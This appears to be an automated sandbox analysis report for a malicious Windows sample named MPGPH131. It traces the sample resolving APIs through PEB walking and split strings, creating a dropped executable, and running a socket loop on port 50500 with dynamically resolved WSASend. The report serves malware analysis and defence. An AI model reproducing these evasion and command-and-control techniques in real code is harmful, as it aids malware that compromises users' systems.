                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
                                  • Instruction ID: ef2bd2446b03d87dde9322ec38de9630bd514c597b0317076d13db0be612664f
                                  • Opcode Fuzzy Hash: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
                                  • Instruction Fuzzy Hash: 2F3160B19041489FC718EBA4D846BAE7BA9FF45300F10417AF419D77C2EB35AE04C792

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:1.2%
                                  Signature Coverage:0%
                                  Total number of Nodes:324
                                  Total number of Limit Nodes:19
                                  execution_graph 23156 65a867 49 API calls ___std_exception_copy 22731 656ba6 22732 656bb9 ___std_exception_copy 22731->22732 22737 6568fd 22732->22737 22736 656bdb 22739 656909 std::_Locinfo::_Locinfo_ctor 22737->22739 22738 65690f 22759 652193 39 API calls 2 library calls 22738->22759 22739->22738 22742 656952 22739->22742 22741 65692a 22748 651f4c 39 API calls ___std_exception_copy 22741->22748 22749 65a800 RtlEnterCriticalSection 22742->22749 22744 65695e 22750 656a80 22744->22750 22746 656974 22760 65699d RtlLeaveCriticalSection 22746->22760 22748->22736 22749->22744 22751 656aa6 22750->22751 22752 656a93 22750->22752 22761 6569a7 22751->22761 22752->22746 22754 656ac9 22758 656b57 22754->22758 22765 653041 22754->22765 22758->22746 22759->22741 22760->22741 22762 656a10 22761->22762 22763 6569b8 22761->22763 22762->22754 22763->22762 22774 65bbad 41 API calls ___std_exception_copy 22763->22774 22766 65305a 22765->22766 22770 653081 22765->22770 22766->22770 22775 6639f2 22766->22775 22768 653076 22782 662dfb 22768->22782 22771 65bbed 22770->22771 22852 65bacc 22771->22852 22773 65bc06 22773->22758 22774->22762 22776 663a13 22775->22776 22777 6639fe 22775->22777 22776->22768 22793 65acaf 14 API calls __dosmaperr 22777->22793 22779 663a03 22794 652210 39 API calls ___std_exception_copy 22779->22794 22781 663a0e 22781->22768 22784 662e07 std::_Locinfo::_Locinfo_ctor 22782->22784 22783 662e0f 22783->22770 22784->22783 22785 662e48 22784->22785 22787 662e8e 22784->22787 22824 652193 39 API calls 2 library calls 22785->22824 22795 667ed2 RtlEnterCriticalSection 22787->22795 22789 662e94 22792 662eb2 22789->22792 22796 662f0c 22789->22796 22825 662f04 RtlLeaveCriticalSection 22792->22825 22793->22779 22794->22781 22795->22789 22797 662f34 22796->22797 22823 662f57 22796->22823 22798 662f38 22797->22798 22800 662f93 22797->22800 22833 652193 39 API calls 2 library calls 22798->22833 22801 662fb1 22800->22801 22803 65bbed 41 API calls 22800->22803 22826 662a51 22801->22826 22803->22801 22805 663010 22809 663024 22805->22809 22810 663079 WriteFile 22805->22810 22806 662fc9 22807 662fd1 22806->22807 22808 662ff8 22806->22808 22807->22823 22834 6629e9 6 API calls 22807->22834 22835 662622 53 API calls 3 library calls 22808->22835 22813 663065 22809->22813 22814 66302c 22809->22814 22812 66309b GetLastError 22810->22812 22810->22823 22812->22823 22838 662ace 7 API calls _ValidateLocalCookies 22813->22838 22815 663051 22814->22815 22816 663031 22814->22816 22837 662c92 8 API calls 2 library calls 22815->22837 22819 66303a 22816->22819 22816->22823 22836 662ba9 7 API calls _ValidateLocalCookies 22819->22836 22822 66300b 22822->22823 22823->22792 22824->22783 22825->22783 22839 66e7b4 22826->22839 22828 662ac7 22828->22805 22828->22806 22829 662a63 22829->22828 22830 662a91 22829->22830 22848 657780 49 API calls 2 library calls 22829->22848 22830->22828 22832 662aab GetConsoleMode 22830->22832 22832->22828 22833->22823 22834->22823 22835->22822 22836->22823 22837->22822 22838->22822 22840 66e7c1 22839->22840 22841 66e7ce 22839->22841 22849 65acaf 14 API calls __dosmaperr 22840->22849 22844 66e7da 22841->22844 22850 65acaf 14 API calls __dosmaperr 22841->22850 22843 66e7c6 22843->22829 22844->22829 22846 66e7fb 22851 652210 39 API calls ___std_exception_copy 22846->22851 22848->22830 22849->22843 22850->22846 22851->22843 22858 66814e 22852->22858 22854 65bade 22855 65bafa SetFilePointerEx 22854->22855 22857 65bae6 22854->22857 22856 65bb12 GetLastError 22855->22856 22855->22857 22856->22857 22857->22773 22859 66815b 22858->22859 22862 668170 22858->22862 22871 65ac9c 14 API calls __dosmaperr 22859->22871 22861 668160 22872 65acaf 14 API calls __dosmaperr 22861->22872 22865 668195 22862->22865 22873 65ac9c 14 API calls __dosmaperr 22862->22873 22865->22854 22866 6681a0 22874 65acaf 14 API calls __dosmaperr 22866->22874 22867 668168 22867->22854 22869 6681a8 22875 652210 39 API calls ___std_exception_copy 22869->22875 22871->22861 22872->22867 22873->22866 22874->22869 22875->22867 23174 829bc4 LoadStringA 23183 66d1e1 50 API calls 3 library calls 23073 109a000 23075 109a044 GetPEB 23073->23075 23076 109a077 CreateFileA 23075->23076 23078 109a22d 23076->23078 23188 5da190 52 API calls 23153 829b8c 23154 829b99 VirtualAlloc 23153->23154 23158 5eca10 39 API calls 23175 66d930 50 API calls 3 library calls 23169 572540 51 API calls std::locale::_Init 23176 578b00 41 API calls ___std_exception_copy 23177 58a100 196 API calls 3 library calls 23178 653b3f 11 API calls 23161 64bcf9 9 API calls 3 library calls 23164 650880 20 API calls 4 library calls 23165 584ab0 43 API calls std::locale::_Setgloballocale 23172 66db48 53 API calls 3 library calls 22876 652dd0 22879 652d0e 22876->22879 22882 652d1a std::_Locinfo::_Locinfo_ctor 22879->22882 22880 652d21 22904 65acaf 14 API calls __dosmaperr 22880->22904 22882->22880 22884 652d41 22882->22884 22883 652d26 22905 652210 39 API calls ___std_exception_copy 22883->22905 22886 652d46 22884->22886 22887 652d53 22884->22887 22906 65acaf 14 API calls __dosmaperr 22886->22906 22896 6640f8 22887->22896 22889 652d31 22892 652d70 22908 652dae RtlLeaveCriticalSection 22892->22908 22893 652d63 22907 65acaf 14 API calls __dosmaperr 22893->22907 22897 664104 std::_Locinfo::_Locinfo_ctor 22896->22897 22909 65d777 RtlEnterCriticalSection 22897->22909 22899 664112 22910 66419c 22899->22910 22904->22883 22905->22889 22906->22889 22907->22889 22908->22889 22909->22899 22913 6641bf 22910->22913 22911 664217 22926 663e63 22911->22926 22913->22911 22919 66411f 22913->22919 22933 65a800 RtlEnterCriticalSection 22913->22933 22934 65a814 RtlLeaveCriticalSection 22913->22934 22917 664229 22917->22919 22936 664ffd 6 API calls std::_Locinfo::_Locinfo_ctor 22917->22936 22923 664158 22919->22923 22920 664248 22937 65a800 RtlEnterCriticalSection 22920->22937 22940 65d7bf RtlLeaveCriticalSection 22923->22940 22925 652d5c 22925->22892 22925->22893 22931 663e70 __Getctype 22926->22931 22927 663eb0 22939 65acaf 14 API calls __dosmaperr 22927->22939 22928 663e9b RtlAllocateHeap 22929 663eae 22928->22929 22928->22931 22935 664823 14 API calls __dosmaperr 22929->22935 22931->22927 22931->22928 22938 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 22931->22938 22933->22913 22934->22913 22935->22917 22936->22920 22937->22919 22938->22931 22939->22929 22940->22925 23185 6519d0 5 API calls _ValidateLocalCookies 22941 58ec20 22942 58f0bf 22941->22942 22945 58ec5e 22941->22945 22943 58eca7 setsockopt recv WSAGetLastError 22943->22942 22943->22945 22945->22943 22946 58ecff 22945->22946 22947 58f0aa Sleep 22945->22947 22950 58f09c Sleep 22945->22950 22959 58db60 WSAStartup 22945->22959 22972 584a90 22945->22972 22975 58e060 22945->22975 22990 5d8610 22946->22990 22947->22942 22947->22945 22950->22947 22951 58ed38 recv 22952 58ed59 recv 22951->22952 22958 58ed7a 22951->22958 22952->22958 22955 5d8610 41 API calls 22956 58edc1 setsockopt recv 22955->22956 22956->22958 22958->22950 22958->22955 22995 5d5d50 22958->22995 23012 58e460 81 API calls 22958->23012 22960 58dc66 22959->22960 22961 58db98 22959->22961 22960->22945 22961->22960 22962 58dbce getaddrinfo 22961->22962 22963 58dc60 WSACleanup 22962->22963 22964 58dc16 22962->22964 22963->22960 22965 58dc74 FreeAddrInfoW 22964->22965 22966 58dc24 socket 22964->22966 22965->22963 22967 58dc80 22965->22967 22966->22963 22968 58dc3a connect 22966->22968 22967->22945 22969 58dc4c closesocket 22968->22969 22970 58dc70 22968->22970 22969->22966 22971 58dc56 FreeAddrInfoW 22969->22971 22970->22965 22971->22963 23013 64c6dc 22972->23013 22974 584a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22974->22945 22976 5d5d50 41 API calls 22975->22976 22978 58e0aa 22976->22978 23021 5d5bd0 22978->23021 22979 58e204 22980 58e44b 22979->22980 22981 58e22e 22979->22981 23026 652220 39 API calls 2 library calls 22980->23026 22983 5d8610 41 API calls 22981->22983 22986 58e26e std::locale::_Init 22981->22986 22983->22986 22986->22986 22987 58e37d GetModuleHandleA GetProcAddress WSASend 22986->22987 22988 58e3b7 22986->22988 22987->22986 22987->22988 22989 58e423 22988->22989 23027 652220 39 API calls 2 library calls 22988->23027 22989->22945 22991 5d8657 22990->22991 22994 5d8628 std::locale::_Setgloballocale 22990->22994 23029 5dba20 22991->23029 22993 5d866a 22993->22951 22994->22951 22996 5d5d7a 22995->22996 22997 5d5d8b 22996->22997 22998 5d5e32 22996->22998 22999 5d5d97 std::locale::_Init 22997->22999 23001 5d5dbc 22997->23001 23004 5d5dfe 22997->23004 23005 5d5df5 22997->23005 23070 572040 41 API calls std::locale::_Setgloballocale 22998->23070 22999->22958 23006 64cd02 std::_Facet_Register 41 API calls 23001->23006 23002 5d5e37 23071 571fa0 41 API calls 2 library calls 23002->23071 23008 64cd02 std::_Facet_Register 41 API calls 23004->23008 23010 5d5dd6 std::locale::_Init 23004->23010 23005->23001 23005->23002 23007 5d5dcf 23006->23007 23007->23010 23072 652220 39 API calls 2 library calls 23007->23072 23008->23010 23010->22958 23012->22958 23016 64ccdc 23013->23016 23017 64cced GetSystemTimePreciseAsFileTime 23016->23017 23018 64ccf9 GetSystemTimeAsFileTime 23016->23018 23019 64c6ea 23017->23019 23018->23019 23019->22974 23022 5d5c01 23021->23022 23023 5d5bde 23021->23023 23022->22979 23023->23022 23028 652220 39 API calls 2 library calls 23023->23028 23030 5dbb6c 23029->23030 23031 5dba45 23029->23031 23055 572040 41 API calls std::locale::_Setgloballocale 23030->23055 23035 5dbaa6 23031->23035 23036 5dbab3 23031->23036 23039 5dba5a 23031->23039 23033 5dbb71 23056 571fa0 41 API calls 2 library calls 23033->23056 23035->23033 23035->23039 23038 5dba6a std::locale::_Init std::locale::_Setgloballocale 23036->23038 23041 64cd02 std::_Facet_Register 41 API calls 23036->23041 23043 5dbb2a std::locale::_Init std::locale::_Setgloballocale 23038->23043 23057 652220 39 API calls 2 library calls 23038->23057 23044 64cd02 23039->23044 23041->23038 23043->22993 23046 64cd07 23044->23046 23047 64cd21 23046->23047 23050 571fa0 Concurrency::cancel_current_task 23046->23050 23060 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 23046->23060 23061 65b99c 23046->23061 23047->23038 23049 64cd2d 23049->23049 23050->23049 23058 64e96b RaiseException 23050->23058 23052 571fbc 23059 64e0c1 40 API calls ___std_exception_copy 23052->23059 23054 571fe3 23054->23038 23055->23033 23056->23038 23058->23052 23059->23054 23060->23046 23067 66489d __Getctype 23061->23067 23062 6648db 23069 65acaf 14 API calls __dosmaperr 23062->23069 23064 6648c6 RtlAllocateHeap 23065 6648d9 23064->23065 23064->23067 23065->23046 23067->23062 23067->23064 23068 65f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 23067->23068 23068->23067 23069->23065 23070->23002 23071->23007 23079 656658 23080 65666b ___std_exception_copy 23079->23080 23085 656533 23080->23085 23082 656677 23096 651f4c 39 API calls ___std_exception_copy 23082->23096 23084 656683 23086 65653f std::_Locinfo::_Locinfo_ctor 23085->23086 23087 65656c 23086->23087 23088 656549 23086->23088 23095 656564 23087->23095 23097 65a800 RtlEnterCriticalSection 23087->23097 23112 652193 39 API calls 2 library calls 23088->23112 23091 65658a 23098 6565ca 23091->23098 23093 656597 23113 6565c2 RtlLeaveCriticalSection 23093->23113 23095->23082 23096->23084 23097->23091 23099 6565d7 23098->23099 23100 6565fa 23098->23100 23125 652193 39 API calls 2 library calls 23099->23125 23102 6565f2 23100->23102 23103 653041 72 API calls 23100->23103 23102->23093 23104 656612 23103->23104 23114 66485d 23104->23114 23107 6639f2 39 API calls 23108 656626 23107->23108 23118 6624af 23108->23118 23112->23095 23113->23095 23115 664874 23114->23115 23116 65661a 23114->23116 23115->23116 23127 664823 14 API calls __dosmaperr 23115->23127 23116->23107 23120 6624d8 23118->23120 23121 65662d 23118->23121 23119 662527 23136 652193 39 API calls 2 library calls 23119->23136 23120->23119 23123 6624ff 23120->23123 23121->23102 23126 664823 14 API calls __dosmaperr 23121->23126 23128 66241e 23123->23128 23125->23102 23126->23102 23127->23116 23129 66242a std::_Locinfo::_Locinfo_ctor 23128->23129 23137 667ed2 RtlEnterCriticalSection 23129->23137 23131 662438 23132 662469 23131->23132 23138 662582 23131->23138 23151 6624a3 RtlLeaveCriticalSection 23132->23151 23135 66248c 23135->23121 23136->23121 23137->23131 23139 66814e 39 API calls 23138->23139 23142 662592 23139->23142 23140 662598 23152 6680bd 15 API calls __dosmaperr 23140->23152 23142->23140 23143 66814e 39 API calls 23142->23143 23150 6625ca 23142->23150 23145 6625c1 23143->23145 23144 66814e 39 API calls 23146 6625d6 FindCloseChangeNotification 23144->23146 23147 66814e 39 API calls 23145->23147 23146->23140 23148 6625e2 GetLastError 23146->23148 23147->23150 23148->23140 23149 6625f0 23149->23132 23150->23140 23150->23144 23151->23135 23152->23149 23186 65abd8 74 API calls ___std_exception_copy 23193 66dd9b 51 API calls 3 library calls

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 109a044-109a074 GetPEB 1 109a077-109a09a 0->1 2 109a09d-109a0a0 1->2 3 109a1ee-109a22b CreateFileA 2->3 4 109a0a6-109a0bc 2->4 25 109a22d-109a230 3->25 26 109a265-109a269 3->26 5 109a0be-109a0c5 4->5 6 109a110-109a116 4->6 5->6 7 109a0c7-109a0ce 5->7 9 109a129-109a12f 6->9 10 109a118-109a11f 6->10 7->6 11 109a0d0-109a0d7 7->11 13 109a148-109a14e 9->13 14 109a131-109a138 9->14 10->9 12 109a121-109a124 10->12 11->6 17 109a0d9-109a0dd 11->17 19 109a1bb-109a1c0 12->19 15 109a150-109a157 13->15 16 109a167-109a16f 13->16 14->13 20 109a13a-109a141 14->20 15->16 21 109a159-109a160 15->21 22 109a188-109a18e 16->22 23 109a171-109a178 16->23 17->6 24 109a0df-109a0e3 17->24 28 109a1e0-109a1e9 19->28 29 109a1c2-109a1c5 19->29 20->13 27 109a143-109a146 20->27 21->16 31 109a162-109a165 21->31 34 109a190-109a197 22->34 35 109a1a7-109a1ad 22->35 23->22 32 109a17a-109a181 23->32 24->19 33 109a0e9-109a10b 24->33 36 109a232-109a238 25->36 27->19 28->2 29->28 30 109a1c7-109a1ca 29->30 30->28 37 109a1cc-109a1cf 30->37 31->19 32->22 38 109a183-109a186 32->38 33->1 34->35 39 109a199-109a1a0 34->39 35->19 40 109a1af-109a1b6 35->40 41 109a23a-109a242 36->41 42 109a246-109a251 36->42 37->28 43 109a1d1-109a1d4 37->43 38->19 39->35 45 109a1a2-109a1a5 39->45 40->19 46 109a1b8 40->46 41->36 47 109a244 41->47 48 109a255-109a261 42->48 43->28 49 109a1d6-109a1d9 43->49 45->19 46->19 47->48 48->26 49->28 50 109a1db-109a1de 49->50 50->3 50->28
                                  APIs
                                  • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0109A223
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
                                  • API String ID: 823142352-2918638317
                                  • Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction ID: d3f3f8a63ac02c8ff0457c9edaca4e9d9848a01bee70ee05101bcf4be828cf60
                                  • Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction Fuzzy Hash: 2D6160B4E01215DFCF65CF98C8A4AADFBF0BF48355F1482AAD585AB211C3309A81DF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 52 58ec20-58ec58 53 58ec5e 52->53 54 58f0bf-58f0d3 52->54 55 58ec64-58ec6c 53->55 56 58ec6e-58ec94 call 58db60 55->56 57 58eca7-58ecf0 setsockopt recv WSAGetLastError 55->57 60 58ec99-58eca1 56->60 57->54 59 58ecf6-58ecf9 57->59 61 58ecff-58ed53 call 5d8610 recv 59->61 62 58f037-58f053 call 584a90 59->62 60->57 63 58f0aa-58f0b9 Sleep 60->63 73 58ed59-58ed74 recv 61->73 74 58efe4-58eff1 61->74 68 58f09c-58f0a4 Sleep 62->68 69 58f055 62->69 63->54 63->55 68->63 71 58f05f-58f086 call 58e060 69->71 72 58f057-58f05d 69->72 80 58f08b-58f097 71->80 72->68 72->71 73->74 76 58ed7a-58edb1 73->76 74->68 77 58eff7-58f003 74->77 81 58edb3-58ee11 call 5d8610 setsockopt recv 76->81 82 58ee14-58ee44 call 5d5d50 76->82 78 58f019-58f023 call 64cf83 77->78 79 58f005-58f013 77->79 78->68 79->78 80->68 81->82 89 58ee4a 82->89 90 58ef64-58efb3 call 58e460 82->90 91 58ee50-58ef5e 89->91 90->74 96 58efb5-58efc4 90->96 91->90 97 58efda-58efe1 call 64cf83 96->97 98 58efc6-58efd4 96->98 97->74 98->97
                                  APIs
                                  • setsockopt.WS2_32(00000304,0000FFFF,00001006,?,00000008), ref: 0058ECC6
                                  • recv.WS2_32(?,00000004,00000002), ref: 0058ECE1
                                  • WSAGetLastError.WS2_32 ref: 0058ECE5
                                  • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0058ED4E
                                  • recv.WS2_32(00000000,0000000C,00000008), ref: 0058ED6F
                                  • setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 0058EDEB
                                  • recv.WS2_32(00000000,?,00000008), ref: 0058EE0C
                                    • Part of subcall function 0058DB60: WSAStartup.WS2_32 ref: 0058DB8A
                                    • Part of subcall function 0058DB60: getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
                                    • Part of subcall function 0058DB60: socket.WS2_32(?,?,?), ref: 0058DC2D
                                    • Part of subcall function 0058DB60: connect.WS2_32(00000000,?,?), ref: 0058DC41
                                    • Part of subcall function 0058DB60: closesocket.WS2_32(00000000), ref: 0058DC4D
                                    • Part of subcall function 0058DB60: FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
                                    • Part of subcall function 0058DB60: WSACleanup.WS2_32 ref: 0058DC60
                                  • recv.WS2_32(?,00000004,00000008), ref: 0058F033
                                  • Sleep.KERNELBASE(00000001), ref: 0058F09E
                                  • Sleep.KERNELBASE(00000064), ref: 0058F0AC
                                  • __Mtx_unlock.LIBCPMT ref: 0058F211
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv$Sleepsetsockopt$AddrCleanupErrorFreeInfoLastMtx_unlockStartupclosesocketconnectgetaddrinfosocket
                                  • String ID: 50500
                                  • API String ID: 1335176318-2230786414
                                  • Opcode ID: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
                                  • Instruction ID: e815da0b8745a4523305507f403edeecbc16e5074be9bf3367977a054ed3e852
                                  • Opcode Fuzzy Hash: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
                                  • Instruction Fuzzy Hash: 88B1BF31D00259DFEB24EBA8CC45BADBBB6FB45310F248219E945AB292D770A985CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 101 58db60-58db92 WSAStartup 102 58db98-58dbc2 call 577d20 * 2 101->102 103 58dc66-58dc6f 101->103 108 58dbce-58dc14 getaddrinfo 102->108 109 58dbc4-58dbc8 102->109 110 58dc60 WSACleanup 108->110 111 58dc16-58dc1c 108->111 109->103 109->108 110->103 112 58dc1e 111->112 113 58dc74-58dc7e FreeAddrInfoW 111->113 114 58dc24-58dc38 socket 112->114 113->110 115 58dc80-58dc88 113->115 114->110 116 58dc3a-58dc4a connect 114->116 117 58dc4c-58dc54 closesocket 116->117 118 58dc70 116->118 117->114 119 58dc56-58dc5a FreeAddrInfoW 117->119 118->113 119->110
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
                                  • String ID: 50500
                                  • API String ID: 448659506-2230786414
                                  • Opcode ID: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
                                  • Instruction ID: a52701d7bfc6585b2b9b6cbe7c7c4f636c4e0ae16b54ff5062cd3c14212df4c3
                                  • Opcode Fuzzy Hash: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
                                  • Instruction Fuzzy Hash: 533180725047049BD7209F28EC48A2ABBF5FB89734F04471DF8A9A22E0D3719D448BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 120 58e060-58e0af call 5d5d50 123 58e1d4-58e20a call 5d5bd0 120->123 124 58e0b5-58e0b8 120->124 133 58e238-58e26c call 577d20 123->133 134 58e20c-58e218 123->134 125 58e0c0-58e0e6 124->125 127 58e0f8-58e107 125->127 128 58e0e8-58e0f3 125->128 131 58e109-58e112 127->131 132 58e117-58e123 127->132 130 58e1c7 128->130 135 58e1ca-58e1ce 130->135 131->130 136 58e133-58e13f 132->136 137 58e125-58e12e 132->137 146 58e26e-58e280 133->146 147 58e282-58e28a call 5d8610 133->147 138 58e21a-58e228 134->138 139 58e22e-58e235 call 64cf83 134->139 135->123 135->125 141 58e14c-58e158 136->141 142 58e141-58e14a 136->142 137->130 138->139 143 58e44b call 652220 138->143 139->133 149 58e15a-58e163 141->149 150 58e165-58e171 141->150 142->130 154 58e450-58e455 call 652220 143->154 152 58e28f-58e2e2 call 577d20 * 2 146->152 147->152 149->130 155 58e17e-58e18a 150->155 156 58e173-58e17c 150->156 168 58e2e4-58e313 call 577d20 call 64e9e0 152->168 169 58e316-58e32c call 577d20 152->169 159 58e18c-58e195 155->159 160 58e197-58e1a3 155->160 156->130 159->130 161 58e1b0-58e1b9 160->161 162 58e1a5-58e1ae 160->162 161->135 165 58e1bb-58e1c3 161->165 162->130 165->130 168->169 174 58e332-58e338 169->174 175 58e3b7 169->175 177 58e340-58e36c 174->177 178 58e3bb-58e3c1 175->178 180 58e370-58e37b 177->180 181 58e3eb-58e403 178->181 182 58e3c3-58e3cf 178->182 180->180 183 58e37d-58e3ab GetModuleHandleA GetProcAddress WSASend 180->183 186 58e435-58e44a 181->186 187 58e405-58e411 181->187 184 58e3e1-58e3e8 call 64cf83 182->184 185 58e3d1-58e3df 182->185 188 58e3ad-58e3b5 183->188 189 58e425-58e429 183->189 184->181 185->154 185->184 191 58e42b-58e432 call 64cf83 187->191 192 58e413-58e421 187->192 188->175 188->177 189->178 191->186 192->154 195 58e423 192->195 195->191
                                  APIs
                                  • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E386
                                  • GetProcAddress.KERNEL32(00000000,89988B80), ref: 0058E391
                                  • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E3A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
